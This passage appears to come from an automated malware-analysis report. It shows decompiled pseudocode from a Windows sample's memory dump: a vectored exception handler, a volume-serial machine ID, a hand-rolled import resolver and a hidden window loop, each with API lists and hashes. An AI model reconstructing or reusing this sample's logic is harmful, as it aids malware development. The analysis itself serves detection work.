    						_push(0xfffffffe);
    						goto L8;
    					}
    					_push(0xfffffff5);
    					goto L8;
    				}
    				return _t10 | 0xffffffff;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d0245a9b27479b5fa69b150c7ef3cb326fcf0d6f4cdf4afcd7e00c2931f0c97f
    • Instruction ID: 4d9df8c896b71bbb4325747987a31f00b87b0ce33fef9b1792dece7869bd492c
    • Opcode Fuzzy Hash: d0245a9b27479b5fa69b150c7ef3cb326fcf0d6f4cdf4afcd7e00c2931f0c97f
    • Instruction Fuzzy Hash: D2210B35A043156AD71CEBB9DC46E6B37ACEB45270B34072EF425D72D8EA31D4018795
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E03605A49(void* __eflags) {
    				intOrPtr _t2;
    				void* _t6;
    				void* _t7;
    
    				_t2 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t2 + 0x108))(1, E036059EE);
    				E03605619(_t6, _t7); // executed
    				return 0;
    			}

    APIs
    • RtlAddVectoredExceptionHandler.NTDLL(00000001,036059EE,03605CD0), ref: 03605A55
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ExceptionHandlerVectored
    • String ID:
    • API String ID: 3310709589-0
    • Opcode ID: 232dcb991cea7a50207f26e4f6e17b19fcf66033f0cc1b3cde8ce0133a66def3
    • Instruction ID: b7ad312b9c94c01920eed697b96bea3ae755d78ffaa1647c6757c04a18eb49e4
    • Opcode Fuzzy Hash: 232dcb991cea7a50207f26e4f6e17b19fcf66033f0cc1b3cde8ce0133a66def3
    • Instruction Fuzzy Hash: 26B092303682009FC784A760990BE9A32906B12701F0900A47286CA0AADAD188A15A45
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E03604A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
    				char _v516;
    				void _v1044;
    				char _v1076;
    				signed int _v1080;
    				signed int _v1096;
    				WCHAR* _v1100;
    				intOrPtr _v1104;
    				signed int _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1144;
    				char _v1148;
    				void* __esi;
    				intOrPtr _t66;
    				intOrPtr _t73;
    				signed int _t75;
    				intOrPtr _t76;
    				signed int _t80;
    				signed int _t81;
    				WCHAR* _t87;
    				void* _t89;
    				signed int _t90;
    				signed int _t91;
    				signed int _t93;
    				signed int _t94;
    				WCHAR* _t96;
    				intOrPtr _t106;
    				intOrPtr _t107;
    				void* _t108;
    				intOrPtr _t109;
    				signed char _t116;
    				WCHAR* _t118;
    				void* _t122;
    				signed int _t123;
    				intOrPtr _t125;
    				void* _t128;
    				void* _t129;
    				WCHAR* _t130;
    				void* _t134;
    				void* _t141;
    				void* _t143;
    				WCHAR* _t145;
    				signed int _t153;
    				void* _t154;
    				void* _t178;
    				signed int _t180;
    				void* _t181;
    				void* _t183;
    				void* _t187;
    				signed int _t188;
    				WCHAR* _t190;
    				signed int _t191;
    				signed int _t192;
    				intOrPtr* _t194;
    				signed int _t196;
    				void* _t199;
    				void* _t200;
    				void* _t201;
    				void* _t202;
    				intOrPtr* _t203;
    				void* _t208;
    
    				_t208 = __fp0;
    				_push(_t191);
    				_t128 = __edx;
    				_t187 = __ecx;
    				_t192 = _t191 | 0xffffffff;
    				memset( &_v1044, 0, 0x20c);
    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
    				_v1108 = 1;
    				if(_t187 != 0) {
    					_t123 =  *0x361e688; // 0x33f0000
    					_t125 =  *0x361e68c; // 0x530f890
    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
    				}
    				if(E0360BB73(_t187) != 0) {
    					L4:
    					_t134 = _t128; // executed
    					_t66 = E0360B78E(_t134,  &_v516); // executed
    					_push(_t134);
    					_v1104 = _t66;
    					E0360B663(_t66,  &_v1076, _t206, _t208);
    					_t129 = E036049C8( &_v1076,  &_v1076, _t206);
    					_t141 = E0360D40B( &_v1076, E0360C384( &_v1076), 0);
    					E0360B870(_t141,  &_v1100, _t208);
    					_t175 =  &_v1076;
    					_t73 = E03602C8F(_t187,  &_v1076, _t206, _t208); // executed
    					_v1112 = _t73;
    					_t143 = _t141;
    					if(_t73 != 0) {
    						_push(0);
    						_push(_t129);
    						_push("\\");
    						_t130 = E036092CB(_t73);
    						_t200 = _t199 + 0x10;
    						_t75 =  *0x361e688; // 0x33f0000
    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
    							L12:
    							__eflags = _v1108;
    							if(__eflags != 0) {
    								_t76 = E036091C9(_v1112);
    								_t145 = _t130;
    								 *0x361e740 = _t76;
    								 *0x361e738 = E036091C9(_t145);
    								L17:
    								_push(_t145);
    								_t80 = E03609B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
    								_t188 = _t80;
    								_t201 = _t200 + 0x10;
    								__eflags = _t188;
    								if(_t188 == 0) {
    									goto L41;
    								}
    								_push(0x361b9c2);
    								E03609F2E(0xe); // executed
    								E03609F52(_t188, _t208, _t130); // executed
    								_t194 = _a4;
    								_v1096 = _v1096 & 0x00000000;
    								_push(2);
    								_v1100 =  *_t194;
    								_push(8);
    								_push( &_v1100);
    								_t178 = 0xb; // executed
    								E0360A091(_t188, _t178, _t208); // executed
    								_t179 =  *(_t194 + 0x10);
    								_t202 = _t201 + 0xc;
    								__eflags =  *(_t194 + 0x10);
    								if( *(_t194 + 0x10) != 0) {
    									E0360A3D3(_t188, _t179, _t208);
    								}
    								_t180 =  *(_t194 + 0xc);
    								__eflags = _t180;
    								if(_t180 != 0) {
    									E0360A3D3(_t188, _t180, _t208); // executed
    								}
    								_t87 = E036097F2(0);
    								_push(2);
    								_v1100 = _t87;
    								_t153 = _t188;
    								_push(8);
    								_v1096 = _t180;
    								_push( &_v1100);
    								_t181 = 2; // executed
    								_t89 = E0360A091(_t153, _t181, _t208); // executed
    								_t203 = _t202 + 0xc;
    								__eflags = _v1108;
    								if(_v1108 == 0) {
    									_t153 =  *0x361e688; // 0x33f0000
    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										_t90 = E0360FC2A(_t89, _t181, _t208, 0, _t130, 0);
    										_t203 = _t203 + 0xc;
    										goto L26;
    									}
    									_t153 = _t153 + 0x228;
    									goto L25;
    								} else {
    									_t91 =  *0x361e688; // 0x33f0000
    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
    									if(__eflags != 0) {
    										L32:
    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
    											_t183 = 0x64;
    											E0360E249(_t183);
    										}
    										E036052A8( &_v1076, _t208);
    										_t190 = _a8;
    										_t154 = _t153;
    										__eflags = _t190;
    										if(_t190 != 0) {
    											_t94 =  *0x361e688; // 0x33f0000
    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
    												lstrcpyW(_t190, _t130);
    											} else {
    												_t96 = E0360109A(_t154, 0x228);
    												_v1100 = _t96;
    												lstrcpyW(_t190, _t96);
    												E036085BB( &_v1100);
    												 *_t203 = "\"";
    												lstrcatW(_t190, ??);
    												lstrcatW(_t190, _t130);
    												lstrcatW(_t190, "\"");
    											}
    										}
    										_t93 = _a12;
    										__eflags = _t93;
    										if(_t93 != 0) {
    											 *_t93 = _v1104;
    										}
    										_t192 = 0;
    										__eflags = 0;
    										goto L41;
    									}
    									_t51 = _t91 + 0x228; // 0x33f0228
    									_t153 = _t51;
    									L25:
    									_t90 = E03605527(_t153, _t130, __eflags);
    									L26:
    									__eflags = _t90;
    									if(_t90 >= 0) {
    										_t91 =  *0x361e688; // 0x33f0000
    										goto L32;
    									}
    									_push(0xfffffffd);
    									L6:
    									_pop(_t192);
    									goto L41;
    								}
    							}
    							_t106 = E0360C29D(_v1104, __eflags);
    							_v1112 = _t106;
    							_t107 =  *0x361e684; // 0x530f6c8
    							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
    							__eflags = _t108 - _t192;
    							if(_t108 != _t192) {
    								_t109 =  *0x361e684; // 0x530f6c8
    								 *((intOrPtr*)(_t109 + 0x30))();
    								E03608600( &_v1148, _t192);
    								_t145 = _t108;
    								goto L17;
    							}
    							E03608600( &_v1144, _t192);
    							_t81 = 1;
    							goto L42;
    						}
    						_t116 =  *(_t75 + 0x1898);
    						__eflags = _t116 & 0x00000004;
    						if((_t116 & 0x00000004) == 0) {
    							__eflags = _t116;
    							if(_t116 != 0) {
    								goto L12;
    							}
    							L11:
    							E0360E291(_v1112, _t175);
    							goto L12;
    						}
    						_v1080 = _v1080 & 0x00000000;
    						_t118 = E036095C7(_t143, 0x879);
    						_v1100 = _t118;
    						_t175 = _t118;
    						E0360BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
    						E036085BB( &_v1100);
    						_t200 = _t200 + 0x14;
    						goto L11;
    					}
    					_push(0xfffffffe);
    					goto L6;
    				} else {
    					_t122 = E03602BA4( &_v1044, _t192, 0x105); // executed
    					_t206 = _t122;
    					if(_t122 == 0) {
    						L41:
    						_t81 = _t192;
    						L42:
    						return _t81;
    					}
    					goto L4;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: lstrcat$lstrcpy$memset
    • String ID:
    • API String ID: 1985475764-0
    • Opcode ID: 8a526e06b416bd6178192d7d3d10812e4b6943403ebb461fb32bc32596f762fd
    • Instruction ID: 216ca5500acf6445e1e75808cbe5ef22edfbf7ab2efff377650e19dbc2d5e934
    • Opcode Fuzzy Hash: 8a526e06b416bd6178192d7d3d10812e4b6943403ebb461fb32bc32596f762fd
    • Instruction Fuzzy Hash: 3D91E275604300AFD329EB21D986F7BB3E9EB81310F18492DF6558B2C4EFB0D8058B86
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0360B78E(WCHAR* __ecx, void* __edx) {
    				long _v8;
    				long _v12;
    				WCHAR* _v16;
    				short _v528;
    				short _v1040;
    				short _v1552;
    				intOrPtr _t23;
    				WCHAR* _t27;
    				signed int _t29;
    				void* _t33;
    				long _t38;
    				WCHAR* _t43;
    				WCHAR* _t56;
    
    				_t44 = __ecx;
    				_v8 = _v8 & 0x00000000;
    				_t43 = __edx;
    				_t56 = __ecx;
    				memset(__edx, 0, 0x100);
    				_v12 = 0x100;
    				_t23 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
    				lstrcpynW(_t43,  &_v528, 0x100);
    				_t27 = E036095C7(_t44, 0xa88);
    				_v16 = _t27;
    				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
    				asm("sbb eax, eax");
    				_v8 = _v8 &  ~_t29;
    				E036085BB( &_v16);
    				_t33 = E0360C39D(_t43);
    				E03609626( &(_t43[E0360C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
    				lstrcatW(_t43, _t56);
    				_t38 = E0360C39D(_t43);
    				_v12 = _t38;
    				CharUpperBuffW(_t43, _t38);
    				return E0360D40B(_t43, E0360C39D(_t43) + _t40, 0);
    			}

    APIs
    • memset.MSVCRT ref: 0360B7AB
    • lstrcpynW.KERNEL32(?,?,00000100), ref: 0360B7D5
    • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0360B807
      • Part of subcall function 03609626: _vsnwprintf.MSVCRT ref: 03609643
    • lstrcatW.KERNEL32(?,00000114), ref: 0360B840
    • CharUpperBuffW.USER32(?,00000000), ref: 0360B852
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
    • String ID:
    • API String ID: 455400327-0
    • Opcode ID: 6d0c25c1725ef58abe970a0cdd532820932323c0e187ca8f0e098ba1b6b54760
    • Instruction ID: 2142905b7de7fa1b9fe6ff99b6bde5923f4974072119af079385dd7ec60c7e21
    • Opcode Fuzzy Hash: 6d0c25c1725ef58abe970a0cdd532820932323c0e187ca8f0e098ba1b6b54760
    • Instruction Fuzzy Hash: CD2171B6A00318BFD708EBB4DC8AFEF77BCDB44210F10456AB505DB185EA749E448B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0360CF8F(void* __ecx) {
    				intOrPtr _t11;
    				long _t12;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				struct _OSVERSIONINFOA* _t29;
    
    				_push(__ecx);
    				_t29 =  *0x361e688; // 0x33f0000
    				GetCurrentProcess();
    				_t11 = E0360B9EB(); // executed
    				_t1 = _t29 + 0x1644; // 0x33f1644
    				_t25 = _t1;
    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
    				_t33 = _t12;
    				if(_t12 != 0) {
    					_t12 = E03608FA4(_t25, _t33);
    				}
    				_t3 = _t29 + 0x228; // 0x33f0228
    				 *(_t29 + 0x1854) = _t12;
    				 *((intOrPtr*)(_t29 + 0x434)) = E03608FA4(_t3, _t33);
    				memset(_t29, 0, 0x9c);
    				_t29->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t29);
    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
    				_t17 = E0360E3C1(_t3);
    				_t7 = _t29 + 0x220; // 0x33f0220
    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
    				_t18 = E0360E3FC(_t7); // executed
    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
    				return _t18;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(?,?,033F0000,?,0360353A), ref: 0360CF9B
    • GetModuleFileNameW.KERNEL32(00000000,033F1644,00000105,?,?,033F0000,?,0360353A), ref: 0360CFBC
    • memset.MSVCRT ref: 0360CFED
    • GetVersionExA.KERNEL32(033F0000,033F0000,?,0360353A), ref: 0360CFF8
    • GetCurrentProcessId.KERNEL32(?,0360353A), ref: 0360CFFE
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CurrentProcess$FileModuleNameVersionmemset
    • String ID:
    • API String ID: 3581039275-0
    • Opcode ID: 3e6fe6eb7ecaa9b3bee4e34487ce1204ea815e146787c3053659aacd7c7e74b6
    • Instruction ID: 024677593e3a4f2df670973203107665f85cf6b11c89926c4a2e7bd0c80397d5
    • Opcode Fuzzy Hash: 3e6fe6eb7ecaa9b3bee4e34487ce1204ea815e146787c3053659aacd7c7e74b6
    • Instruction Fuzzy Hash: 6801D474901B049BD724FF30984ABDBBBE4EF84310F041C2EE4568B284EB74A501CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E036124A6(signed int __eax, intOrPtr _a4) {
    				intOrPtr* _v8;
    				signed int* _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				struct HINSTANCE__* _v48;
    				intOrPtr _v52;
    				signed int _v56;
    				intOrPtr _v60;
    				signed int _v64;
    				signed int _t109;
    				signed int _t112;
    				signed int _t115;
    				struct HINSTANCE__* _t121;
    				void* _t163;
    
    				_v44 = _v44 & 0x00000000;
    				if(_a4 != 0) {
    					_v48 = GetModuleHandleA("kernel32.dll");
    					_v40 = E0360E0A4(_v48, "GetProcAddress");
    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    					_v32 = _v52;
    					_t109 = 8;
    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
    						L24:
    						return 0;
    					}
    					_v56 = 0x80000000;
    					_t112 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_v8 = _v8 + 0x14;
    					}
    					_t115 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
    						_v36 = _t121;
    						if(_v36 != 0) {
    							if( *_v8 == 0) {
    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
    							} else {
    								_v12 =  *_v8 + _a4;
    							}
    							_v28 = _v28 & 0x00000000;
    							while( *_v12 != 0) {
    								_v24 = _v24 & 0x00000000;
    								_v16 = _v16 & 0x00000000;
    								_v64 = _v64 & 0x00000000;
    								_v20 = _v20 & 0x00000000;
    								if(( *_v12 & _v56) == 0) {
    									_v60 =  *_v12 + _a4;
    									_v20 = _v60 + 2;
    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
    									_v16 = _v40(_v36, _v20);
    								} else {
    									_v24 =  *_v12;
    									_v20 = _v24 & 0x0000ffff;
    									_v16 = _v40(_v36, _v20);
    								}
    								if(_v24 != _v16) {
    									_v44 = _v44 + 1;
    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
    										 *_v12 = _v16;
    									} else {
    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
    									}
    								}
    								_v12 =  &(_v12[1]);
    								_v28 = _v28 + 4;
    							}
    							_v8 = _v8 + 0x14;
    							continue;
    						}
    						_t163 = 0xfffffffd;
    						return _t163;
    					}
    					goto L24;
    				}
    				return __eax | 0xffffffff;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 036124C3
    • LoadLibraryA.KERNELBASE(00000000), ref: 0361255C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID: GetProcAddress$kernel32.dll
    • API String ID: 4133054770-1584408056
    • Opcode ID: 9f037265271cddf04ac5955c768032a964dc8fcc50f6bd1d8e1c374043ee6469
    • Instruction ID: d8857a54f89cb3bb1b17e3636206799aad8e8cc8649342855b9363749f28aec9
    • Opcode Fuzzy Hash: 9f037265271cddf04ac5955c768032a964dc8fcc50f6bd1d8e1c374043ee6469
    • Instruction Fuzzy Hash: 10619175910209EFDB00CF98C595BADBBF1FF08315F188599E815AB391D334AA91CF94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E03602EDA(void* __eflags) {
    				struct _WNDCLASSEXA _v52;
    				char _v80;
    				char _v144;
    				intOrPtr _t25;
    				struct HWND__* _t34;
    				intOrPtr _t36;
    				intOrPtr _t39;
    				struct HWND__* _t44;
    				intOrPtr _t45;
    				intOrPtr _t47;
    				intOrPtr _t50;
    				void* _t51;
    				intOrPtr _t53;
    				intOrPtr _t56;
    				intOrPtr _t59;
    				struct HINSTANCE__* _t64;
    
    				_t25 =  *0x361e684; // 0x530f6c8
    				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
    				memset( &_v52, 0, 0x30);
    				_t59 =  *0x361e688; // 0x33f0000
    				E03609013(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
    				_v52.style = 3;
    				_v52.cbSize = 0x30;
    				_v52.lpszClassName =  &_v144;
    				_v52.lpfnWndProc = E03602E77;
    				_v52.hInstance = _t64;
    				if(RegisterClassExA( &_v52) == 0) {
    					L6:
    					_t34 =  *0x361e718; // 0x1501f4
    					if(_t34 != 0) {
    						_t39 =  *0x361e694; // 0x530f820
    						 *((intOrPtr*)(_t39 + 0x28))(_t34);
    					}
    					L8:
    					_t36 =  *0x361e694; // 0x530f820
    					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
    					return 0;
    				}
    				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
    				 *0x361e718 = _t44;
    				if(_t44 == 0) {
    					goto L8;
    				}
    				_t45 =  *0x361e694; // 0x530f820, executed
    				 *((intOrPtr*)(_t45 + 0x14))(_t44, 0);
    				_t47 =  *0x361e694; // 0x530f820
    				 *((intOrPtr*)(_t47 + 0x18))( *0x361e718);
    				while(1) {
    					_t50 =  *0x361e694; // 0x530f820
    					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
    					if(_t51 == 0) {
    						goto L6;
    					}
    					if(_t51 == 0xffffffff) {
    						goto L6;
    					}
    					_t53 =  *0x361e694; // 0x530f820
    					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
    					_t56 =  *0x361e694; // 0x530f820
    					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
    				}
    				goto L6;
    			}

    APIs
    • memset.MSVCRT ref: 03602EF9
    • RegisterClassExA.USER32(00000030), ref: 03602F4A
    • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 03602F77
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ClassCreateRegisterWindowmemset
    • String ID: 0
    • API String ID: 2030675355-4108050209
    • Opcode ID: 9beb200547da1788ea5c97279e0cc2982915604212176158969885d8e5c70086
    • Instruction ID: a2dde9653e6c0d4fdfac6933b579d21191bc58192020d8fd408ea9b217d6fb27
    • Opcode Fuzzy Hash: 9beb200547da1788ea5c97279e0cc2982915604212176158969885d8e5c70086
    • Instruction Fuzzy Hash: B4313CB1510208AFE704EFA8DDD9EAABBBCEB08344F485466F905D7299D731DD10CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E03604D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
    				char _v516;
    				char _v556;
    				char _v564;
    				char _v568;
    				char _v572;
    				char _v576;
    				intOrPtr _v580;
    				char _v588;
    				signed int _v596;
    				intOrPtr _v602;
    				intOrPtr _v604;
    				char _v608;
    				CHAR* _v612;
    				CHAR* _v616;
    				signed int _v620;
    				signed int _v624;
    				signed int _v628;
    				signed int _v632;
    				char _v636;
    				intOrPtr _t117;
    				void* _t118;
    				signed int _t120;
    				CHAR* _t122;
    				intOrPtr _t123;
    				CHAR* _t125;
    				WCHAR* _t128;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				WCHAR* _t136;
    				intOrPtr _t140;
    				WCHAR* _t141;
    				CHAR* _t142;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t151;
    				WCHAR* _t152;
    				signed int _t157;
    				WCHAR* _t158;
    				intOrPtr _t161;
    				intOrPtr _t163;
    				intOrPtr _t164;
    				intOrPtr _t168;
    				signed int _t171;
    				signed int _t176;
    				WCHAR* _t180;
    				char _t181;
    				intOrPtr _t195;
    				intOrPtr _t206;
    				signed int _t210;
    				char _t215;
    				WCHAR* _t226;
    				intOrPtr _t230;
    				intOrPtr _t233;
    				WCHAR* _t234;
    				signed int _t235;
    				signed int _t242;
    				signed int _t244;
    				signed int _t245;
    				CHAR* _t246;
    				intOrPtr _t258;
    				intOrPtr _t266;
    				void* _t267;
    				void* _t269;
    				intOrPtr _t270;
    				void* _t276;
    				intOrPtr _t278;
    				void* _t295;
    				void* _t296;
    				intOrPtr _t302;
    				WCHAR* _t322;
    				CHAR* _t323;
    				void* _t325;
    				WCHAR* _t326;
    				intOrPtr _t328;
    				WCHAR* _t330;
    				signed int _t333;
    				intOrPtr* _t335;
    				void* _t354;
    
    				_t354 = __fp0;
    				_t335 = (_t333 & 0xfffffff8) - 0x26c;
    				_t117 =  *0x361e688; // 0x33f0000
    				_t242 = 0;
    				_t325 = __ecx;
    				_v620 = 0;
    				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
    					L8:
    					_t118 = E0360B78E(0x361b9c0,  &_v516); // executed
    					_t13 = _t118 + 1; // 0x1
    					E0360A853( &_v556, _t13, 0);
    					_t295 = 0x64;
    					_t120 = E0360A457( &_v556, _t295);
    					 *0x361e748 = _t120;
    					if(_t120 != 0) {
    						_push(0x4e5);
    						_t296 = 0x10;
    						 *0x361e680 = E0360E1C7(0x361b9c4, _t296);
    						 *_t335 = 0x610;
    						_t122 = E036095C7(0x361b9c4);
    						_push(_t242);
    						_push(_t122);
    						_v612 = _t122;
    						_t123 =  *0x361e688; // 0x33f0000
    						_t125 = E036092CB(_t123 + 0x228);
    						_t315 = _t125;
    						_v616 = _t125;
    						E036085BB( &_v612);
    						_t128 = E0360B24F(_t125);
    						__eflags = _t128;
    						if(_t128 != 0) {
    							_t234 = E03608955(_t315, 1, _t242, _t242);
    							__eflags = _t234;
    							if(_t234 != 0) {
    								_t235 = E0360A2C9(_t234);
    							} else {
    								_t235 = _t242;
    							}
    							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
    							 *_t325 = 3;
    						}
    						E03608600( &_v616, 0xfffffffe);
    						_t131 =  *0x361e688; // 0x33f0000
    						_t21 = _t131 + 0x114; // 0x33f0114
    						E03604A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
    						_t258 =  *0x361e688; // 0x33f0000
    						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
    						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
    							L19:
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							_v572 = _t325;
    							_v576 =  *((intOrPtr*)(_t258 + 0x214));
    							_t135 =  *0x361e680; // 0x530fb78
    							_t136 =  *(_t135 + 8);
    							__eflags = _t136;
    							if(_t136 != 0) {
    								 *_t136(_t242, _t242, 1,  &_v568,  &_v564); // executed
    							}
    							_v620 = _t242;
    							E0360E2D1(_t354,  &_v576); // executed
    							_pop(_t258);
    							_t140 =  *0x361e6b4; // 0x530f870
    							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
    							__eflags = _t141;
    							if(_t141 == 0) {
    								E0360E2D1(_t354,  &_v588);
    								_t230 =  *0x361e6b4; // 0x530f870
    								_pop(_t258);
    								 *((intOrPtr*)(_t230 + 0xc))(_v632);
    							}
    							__eflags =  *0x361e73c;
    							if( *0x361e73c <= 0) {
    								goto L37;
    							} else {
    								_t163 =  *0x361e680; // 0x530fb78
    								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
    								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
    									_t226 =  *(_t163 + 0xc);
    									__eflags = _t226;
    									if(_t226 != 0) {
    										 *_t226(_v580);
    									}
    								}
    								_t164 =  *0x361e688; // 0x33f0000
    								_t258 =  *((intOrPtr*)(_t164 + 0x214));
    								__eflags = _t258 - 3;
    								if(_t258 == 3) {
    									goto L37;
    								} else {
    									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
    									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
    										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
    										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
    											goto L37;
    										}
    										E036049A6();
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										_t168 =  *0x361e684; // 0x530f6c8
    										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
    										_t266 = _v602;
    										_t244 = 0x3c;
    										_t171 = _t266 + 0x00000002 & 0x0000ffff;
    										_v596 = _t171;
    										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
    										_t176 = _t266 + 0x0000000e & 0x0000ffff;
    										_v624 = _t176;
    										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
    										_t180 = E036085EA(0x1000);
    										_v632 = _t180;
    										_pop(_t267);
    										__eflags = _t180;
    										if(_t180 != 0) {
    											_t181 = E0360109A(_t267, 0x148);
    											_t302 =  *0x361e688; // 0x33f0000
    											_v636 = _t181;
    											_push(_t302 + 0x648);
    											_push(0xa);
    											_push(7);
    											_t269 = 2;
    											E03609013(_t269,  &_v572);
    											_t270 =  *0x361e688; // 0x33f0000
    											_t330 = E036060C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
    											_v616 = _t330;
    											__eflags = _t330;
    											if(_t330 != 0) {
    												_push(_v624 % _t244 & 0x0000ffff);
    												_push(_v628 & 0x0000ffff);
    												_push(_v596 % _t244 & 0x0000ffff);
    												_push(_v620 & 0x0000ffff);
    												_push(_t330);
    												_push( &_v572);
    												_t195 =  *0x361e688; // 0x33f0000
    												__eflags = _t195 + 0x1020;
    												E03609626(_v632, 0x1000, _v636, _t195 + 0x1020);
    												E036085BB( &_v636);
    												E0360A8F7(_v632, 0, 0xbb8, 1); // executed
    												E03608600( &_v616, 0xfffffffe);
    											}
    											E03608600( &_v632, 0xfffffffe);
    										}
    										goto L42;
    									}
    									__eflags = _t258 - 2;
    									if(_t258 != 2) {
    										goto L37;
    									}
    									E036049A6();
    									asm("stosd");
